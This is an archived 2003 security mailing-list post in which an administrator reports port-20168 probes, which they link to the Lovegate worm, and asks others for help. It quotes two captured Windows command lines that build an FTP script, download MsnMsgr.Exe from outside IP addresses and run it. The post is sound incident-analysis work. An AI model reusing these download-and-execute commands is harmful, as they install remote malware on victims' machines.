New Worm or Worm Variant?

• Previous message: RODDY, Dan: "yahoo instant messenger profile"
• Next in thread: Harlan Carvey: "Re: New Worm or Worm Variant?"
• Reply: Harlan Carvey: "Re: New Worm or Worm Variant?"
• Maybe reply: Charles Hamby: "RE: New Worm or Worm Variant?"
• Maybe reply: Joris De Donder: "Re: New Worm or Worm Variant?"
• Maybe reply: Bassett, Mark: "FW: New Worm or Worm Variant?"
• Reply: Juri Haberland: "Re: New Worm or Worm Variant?"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: Wed, 10 Dec 2003 10:36:23 -0900
To: incidents@securityfocus.com

I've been seeing a jump in 20168/tcp scans over the past week or so. This port is commonly associated with the Lovegate worm. I recently set up a port listener using Netcat to capture
any output from probes against a couple of my systems. Shown below are the results:

echo open 211.26.130.118 >> wxtu.dll & echo USER noxe >> wxtu.dll & echo noxe >> wxtu.dll & echo binary >> wxtu.dll & echo get MsnMsgr.Exe >> wxtu.dll & echo bye >> wxtu.dll & ftp -n -s:wxtu.dll & del wxtu.dll & start MsnMsgr.Exe

echo open 211.26.132.172 >> wxtu.dll & echo USER noxe >> wxtu.dll & echo noxe >> wxtu.dll & echo binary >> wxtu.dll & echo get MsnMsgr.Exe >> wxtu.dll & echo bye >> wxtu.dll & ftp -n -s:wxtu.dll & del wxtu.dll & start MsnMsgr.Exe

At first glance it looks like some sort of non-interactive FTP session to download an exploit (MsnMsgr.Exe), but Googling for wxtu.dll came up empty (so this could be anything from a real .dll to a renamed executable in my mind). A couple of questions for the world at large:

1) Has anyone run across anything like this before? This looks like something automated to me. Worm script, perhaps. The IP I set up the port listener on had roughly 20+ probes on 20168/tcp from noon yesterday to 7am this morning.

2) Any theories on wxtu.dll? Since I can't get a hold of the malware to analyze it, I'm really guessing at this point. MsnMsgr.Exe seems to be the exploit itself, it it appears to be using something like FTPCOM to do a non-interactive FTP session, but wxtu.dll could be anything from a real .dll file to a renamed executable. Ideas?

-cdh

---------------------------------------------------------------------------
----------------------------------------------------------------------------

• Previous message: RODDY, Dan: "yahoo instant messenger profile"
• Next in thread: Harlan Carvey: "Re: New Worm or Worm Variant?"
• Reply: Harlan Carvey: "Re: New Worm or Worm Variant?"
• Maybe reply: Charles Hamby: "RE: New Worm or Worm Variant?"
• Maybe reply: Joris De Donder: "Re: New Worm or Worm Variant?"
• Maybe reply: Bassett, Mark: "FW: New Worm or Worm Variant?"
• Reply: Juri Haberland: "Re: New Worm or Worm Variant?"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]